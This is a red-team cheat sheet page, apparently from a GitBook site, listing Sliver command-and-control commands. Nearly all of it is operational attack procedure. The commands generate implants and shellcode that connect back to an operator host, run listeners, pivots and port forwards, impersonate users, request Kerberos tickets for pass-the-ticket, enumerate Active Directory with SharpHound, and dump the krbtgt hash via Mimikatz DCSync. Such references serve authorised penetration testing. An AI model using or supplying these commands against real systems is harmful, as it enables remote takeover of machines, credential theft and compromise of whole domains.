🕺
CheatSheets
  • Introduction
  • Getting Started With Hacking
  • VMs on Mac
  • Windows
    • Enumeration
    • Local Privilege Escalation
    • UAC Bypasses
    • Persistance
    • Networking
  • Active Directory
    • Offensive Powershell
    • Enumeration
      • BloodHound
    • Lateral Movement
    • Escalation
      • ACL Abuse
      • Kerberoasting
      • Un-Constrained Delegation
      • JEA
    • Persistance
    • Mimikatz
    • Alternate Cred Dumps
    • MSSQL
    • Defences and Bypasses
    • Setting Up a Lab
  • Red Teaming
    • Phishing Payloads
    • Cobalt Strike
    • Metasploit
    • Sliver
  • Linux
    • Networking
    • Enumeration
    • Local Privilege Escalation
    • Persistance
    • MySQL
  • Mainframes
    • HP Nonstop
    • IBM z/OS
  • Cloud
    • AWS
    • GCP
    • Azure
  • Web App
    • Tomcat
    • SQLMap
    • PHP
  • Mobile
    • Android
    • iOS
  • Exploit-Dev
    • Linux
      • Basic Stack Overflows
      • Bypassing NX (DEP)
      • Bypassing ASLR
    • Shellcode
    • Windows
  • WiFi
    • Alfa AWUS036ACH Setup
    • Aircrack-ng
Powered by GitBook
On this page
  • Start a Listener
  • Generate a Payload
  • Generate without Shikata ga nai (no rwx needed)
  • Start a Pivot Listener
  • Remove Pivots / Jobs
  • PortForward
  • Remove PortFwd
  • Make Token
  • Rubeus
  • SharpHound
  • DCSync

Was this helpful?

  1. Red Teaming

Sliver

Start a Listener

mtls -L IP -l PORT

Generate a Payload

generate --mtls IP:PORT --os linux/windows --save OUTFILE

Generate without Shikata ga nai (no rwx needed)

generate --tcp-pivot/--mtls IP:PORT --os windows -e -G -f shellcode --save out.bin

Start a Pivot Listener

pivots tcp --bind IP -l PORT

Remove Pivots / Jobs

jobs
jobs -k ID

PortForward

portfwd add -b 127.0.0.1:8080 -r IP:PORT

Remove PortFwd

# list
portfwd

#remove 
portfwd rm -i ID

Make Token

make-token -u USER -d DOMAIN -p PASSWORD --logon-type LOGON_NETWORK_CLEARTEXT

Rubeus

rubeus -- asktgt /user:USER /password:PASS /ptt

SharpHound

sharp-hound-4 -t 360 -- -c All -s --recursedomains --outputdirectory 'C:\Windows\Temp'

DCSync

mimikatz -- 'lsadump::dcsync /domain:DOMAIN /user:krbtgt'
PreviousMetasploitNextNetworking

Last updated 25 days ago

Was this helpful?